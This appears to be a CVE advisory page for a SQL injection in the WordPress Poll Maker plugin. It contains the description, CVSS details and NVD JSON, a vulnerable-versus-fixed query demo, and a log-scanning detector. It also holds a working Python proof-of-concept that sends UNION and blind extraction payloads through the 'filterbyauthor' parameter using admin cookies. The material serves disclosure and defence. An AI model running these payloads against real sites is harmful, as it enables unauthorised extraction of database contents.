Security Vulnerability Report
CVE-2025-12620 CVSS 4.9 MEDIUM

CVE-2025-12620

Published: 2025-11-13 06:16:00
Last Modified: 2026-04-15 00:35:42

Description

The Poll Maker – Versus Polls, Anonymous Polls, Image Polls plugin for WordPress is vulnerable to generic SQL Injection via the ‘filterbyauthor’ parameter in all versions up to, and including, 6.0.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
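The bug class the description names, a request parameter spliced into a SQL string with neither escaping nor a prepared statement, reduced to something runnable. This is an added example, not the plugin's code: the schema, the rows and both query functions are constructed stand-ins on SQLite, and the payload follows the shape of the PoC further down this page. The same UNION input leaks rows from a second table through the concatenated query and is rejected outright by the bound-parameter version.

```python
import sqlite3

# Constructed stand-in schema for illustration only; the plugin's real tables and
# its list-table query differ, and only the bug class is reproduced here.
SCHEMA = """
CREATE TABLE polls (id INTEGER PRIMARY KEY, title TEXT, author_id INTEGER);
CREATE TABLE users (id INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT);
INSERT INTO polls VALUES (1, 'Favourite colour', 1), (2, 'Lunch vote', 2);
INSERT INTO users VALUES (1, 'admin', '$P$BhashA'), (2, 'editor', '$P$BhashB');
"""


def make_db():
    """In-memory database seeded with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def list_polls_vulnerable(conn, filterbyauthor):
    """Hypothetical reconstruction of the bug: the request value is concatenated
    into the WHERE clause with no escaping and no prepared statement."""
    sql = "SELECT id, title FROM polls WHERE author_id = '" + filterbyauthor + "'"
    return conn.execute(sql).fetchall()


def list_polls_fixed(conn, filterbyauthor):
    """Hardened form: coerce to the expected type, then bind it as a parameter.
    The WordPress equivalent is $wpdb->prepare("... WHERE author_id = %d", $id)."""
    try:
        author_id = int(filterbyauthor)
    except ValueError:
        return []  # a non-numeric author filter is simply rejected
    return conn.execute(
        "SELECT id, title FROM polls WHERE author_id = ?", (author_id,)
    ).fetchall()


# Payload in the shape of the PoC on this page: the quote closes the string
# literal, UNION appends a second SELECT with a matching column count, and
# "-- -" comments out the trailing quote of the original query (MySQL needs
# whitespace after "--"; the extra dash keeps that space from being stripped).
UNION_PAYLOAD = "1' UNION ALL SELECT id, user_pass FROM users -- -"


def demo():
    """Run the same inputs through both query functions and return the rows."""
    conn = make_db()
    return {
        "legit": list_polls_vulnerable(conn, "1"),
        "leaked": list_polls_vulnerable(conn, UNION_PAYLOAD),
        "fixed_same": list_polls_fixed(conn, "1"),
        "fixed_block": list_polls_fixed(conn, UNION_PAYLOAD),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```

The vulnerable function returns password hashes from a table the poll list should never touch, which is exactly the "extract sensitive information" outcome in the description; the fixed function never lets the value reach the parser as SQL.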

CVSS Details

CVSS Score
4.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

Reading the vector: the flaw is reachable over the network with no user interaction, but only from an Administrator session (PR:H), and the assessed impact is confidentiality only (C:H), that is, reading data out of the database rather than modifying it or causing a denial of service.

Configurations (Affected Products)

No CPE configuration data is recorded for this entry.

Affected: Poll Maker WordPress Plugin < 6.0.8 (all versions up to and including 6.0.7; update to 6.0.8 or later).

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-12620 PoC - SQL Injection in Poll Maker WordPress Plugin <= 6.0.7
# Requires an authenticated Administrator session (PR:H in the CVSS vector).
import requests

TARGET_URL = "http://target-wordpress-site.com"

# WordPress names its login cookie wordpress_logged_in_<md5 of the site URL>;
# copy the exact cookie name and value from a logged-in Administrator browser
# session and replace the placeholder entry below.
COOKIES = {
    "wordpress_test_cookie": "WP+Cookie+check",
    "wordpress_logged_in_user": "your_admin_session_cookie",
}

# WordPress admin page that renders the plugin's poll list table. The slug is the
# one used by this PoC as published; confirm it against the installed plugin.
ENDPOINT = f"{TARGET_URL}/wp-admin/admin.php"
PAGE_SLUG = "poll-maker-polls"

# A UNION only works when its column count matches the original list-table query,
# which this PoC does not determine; adjust NUM_COLUMNS and OUTPUT_COLUMN (the
# column whose value ends up rendered on the page) until the injected value appears.
NUM_COLUMNS = 20
OUTPUT_COLUMN = 9


def union_payload(expr, num_columns=NUM_COLUMNS, output_column=OUTPUT_COLUMN):
    """Build "1' UNION SELECT 1,...,<expr>,...,N -- -".

    The quote closes the author-filter string literal, and "-- -" comments out the
    remainder of the original query (MySQL requires whitespace after "--"; the
    trailing dash keeps that space from being trimmed on the way to the database).
    """
    cols = [str(i) for i in range(1, num_columns + 1)]
    cols[output_column - 1] = expr
    return "1' UNION SELECT " + ",".join(cols) + " -- -"


def exploit_sql_injection():
    """UNION-based injection via filterbyauthor, returning the DB user and version.

    The rendered page must be inspected by hand for the injected value.
    """
    params = {
        "page": PAGE_SLUG,
        "filterbyauthor": union_payload("CONCAT(user(),':',version())"),
    }
    try:
        response = requests.get(ENDPOINT, params=params, cookies=COOKIES, timeout=30)
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return None
    if response.status_code == 200:
        print("[+] Request sent successfully")
        print("[+] Check the rendered poll list for the injected value")
        print(f"[*] Target URL: {response.url}")
    else:
        print(f"[-] Request failed with status: {response.status_code}")
    return response


def blind_sql_injection(true_marker, max_len=20):
    """Boolean-based blind extraction, one character per request.

    Pulls the first table name of the current database (which reveals the table
    prefix). true_marker must be a string present in the response only when the
    injected condition holds; find it first by diffing the pages returned for
    filterbyauthor=1' AND 1=1 -- - and filterbyauthor=1' AND 1=2 -- -.
    """
    subquery = ("SELECT table_name FROM information_schema.tables "
                "WHERE table_schema=DATABASE() ORDER BY table_name LIMIT 1")
    extracted = ""
    for pos in range(1, max_len + 1):
        matched = False
        for ascii_val in range(32, 127):
            payload = f"1' AND ASCII(SUBSTRING(({subquery}),{pos},1))={ascii_val} -- -"
            params = {"page": PAGE_SLUG, "filterbyauthor": payload}
            try:
                resp = requests.get(ENDPOINT, params=params, cookies=COOKIES, timeout=10)
            except requests.exceptions.RequestException:
                continue
            if resp.status_code == 200 and true_marker in resp.text:
                extracted += chr(ascii_val)
                print(f"[+] Position {pos}: {chr(ascii_val)!r} (so far: {extracted})")
                matched = True
                break
        if not matched:
            break  # past the end of the string, or the oracle stopped working
    return extracted


if __name__ == "__main__":
    print("CVE-2025-12620 SQL Injection PoC")
    print("Target: WordPress Poll Maker Plugin <= 6.0.7")
    exploit_sql_injection()
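Both request shapes in the PoC above are plain GETs to wp-admin/admin.php with the payload in the query string, so they land in the web server's access log. The detection pass below is an added example, not part of the original PoC or of the plugin: it parses constructed combined-format log lines, percent-decodes filterbyauthor, and flags any value that is not a bare integer (on the assumption that this filter only ever carries a numeric author id), marking hits that also contain SQL metacharacters. The page slug poll-maker-polls is taken from the PoC and is not confirmed here.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in combined log format (not real traffic). The second
# and third mimic the two request shapes of the PoC; the first is a benign filter.
SAMPLE_LOG = """\
10.0.0.5 - - [13/Nov/2025:09:14:02 +0000] "GET /wp-admin/admin.php?page=poll-maker-polls&filterbyauthor=3 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [13/Nov/2025:09:14:40 +0000] "GET /wp-admin/admin.php?page=poll-maker-polls&filterbyauthor=1%27%20UNION%20SELECT%201%2Cuser()%20--%20- HTTP/1.1" 200 6020 "-" "python-requests/2.32"
10.0.0.9 - - [13/Nov/2025:09:15:01 +0000] "GET /wp-admin/admin.php?page=poll-maker-polls&filterbyauthor=1%27%20AND%20ASCII(SUBSTRING((SELECT%20table_name%20FROM%20information_schema.tables%20LIMIT%201),1,1))%3D119%20--%20- HTTP/1.1" 200 5120 "-" "python-requests/2.32"
10.0.0.7 - - [13/Nov/2025:09:16:12 +0000] "GET /wp-admin/admin.php?page=other&filterbyauthor=1%27%20OR%201%3D1%20--%20- HTTP/1.1" 200 4010 "-" "curl/8.4"
10.0.0.5 - - [13/Nov/2025:09:17:30 +0000] "GET /wp-admin/admin.php?page=poll-maker-polls&orderby=title HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# client ip, timestamp, method, request target and status from a combined-format line
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Tokens that never belong in a numeric author id: quote, comment openers,
# UNION/SELECT, and the usual time-based primitives.
SQLI_MARKERS = re.compile(r"'|--|#|/\*|\bunion\b|\bselect\b|\bsleep\s*\(|\bbenchmark\s*\(", re.I)


def inspect_request(target):
    """Return a finding for a request to admin.php whose filterbyauthor value is not
    a plain integer (assumed to be the only legitimate shape), otherwise None."""
    parts = urlsplit(target)
    if parts.path != "/wp-admin/admin.php":
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes the values
    if "filterbyauthor" not in qs:
        return None
    value = qs["filterbyauthor"][0]
    if value.strip().isdigit():
        return None
    return {
        "page": qs.get("page", [""])[0],
        "value": value,
        "sqli_markers": bool(SQLI_MARKERS.search(value)),
    }


def scan_log(text):
    """Run inspect_request over every parseable line; unparseable lines are skipped."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        finding = inspect_request(m["target"])
        if finding:
            finding.update(ip=m["ip"], ts=m["ts"], status=int(m["status"]))
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} page={f['page']!r} markers={f['sqli_markers']} value={f['value']!r}")
```

Because exploitation needs an Administrator session, every hit here comes from an account that already holds wide privileges, so the useful follow-up is to tie the client address back to the WordPress user and check whether that session was expected at all.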

References

https://plugins.trac.wordpress.org/browser/poll-maker/tags/6.0.7/includes/lists/class-poll-maker-polls-list-table.php#L2033 (Poll Maker 6.0.7 source, poll list-table class, line 2033)
https://plugins.trac.wordpress.org/browser/poll-maker/tags/6.0.7/includes/lists/class-poll-maker-polls-list-table.php#L2053 (Poll Maker 6.0.7 source, poll list-table class, line 2053)
https://www.wordfence.com/threat-intel/vulnerabilities/id/56e0efba-4913-4772-8a5b-5cb5c84b5d48?source=cve (Wordfence advisory)
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-12620",
    "sourceIdentifier": "security@wordfence.com",
    "published": "2025-11-13T06:16:00.343",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Poll Maker – Versus Polls, Anonymous Polls, Image Polls plugin for WordPress is vulnerable to generic SQL Injection via the ‘filterbyauthor’ parameter in all versions up to, and including, 6.0.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "security@wordfence.com",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 4.9,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 1.2,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "security@wordfence.com",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-89"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/poll-maker/tags/6.0.7/includes/lists/class-poll-maker-polls-list-table.php#L2033",
        "source": "security@wordfence.com"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/poll-maker/tags/6.0.7/includes/lists/class-poll-maker-polls-list-table.php#L2053",
        "source": "security@wordfence.com"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/56e0efba-4913-4772-8a5b-5cb5c84b5d48?source=cve",
        "source": "security@wordfence.com"
      }
    ]
  }
}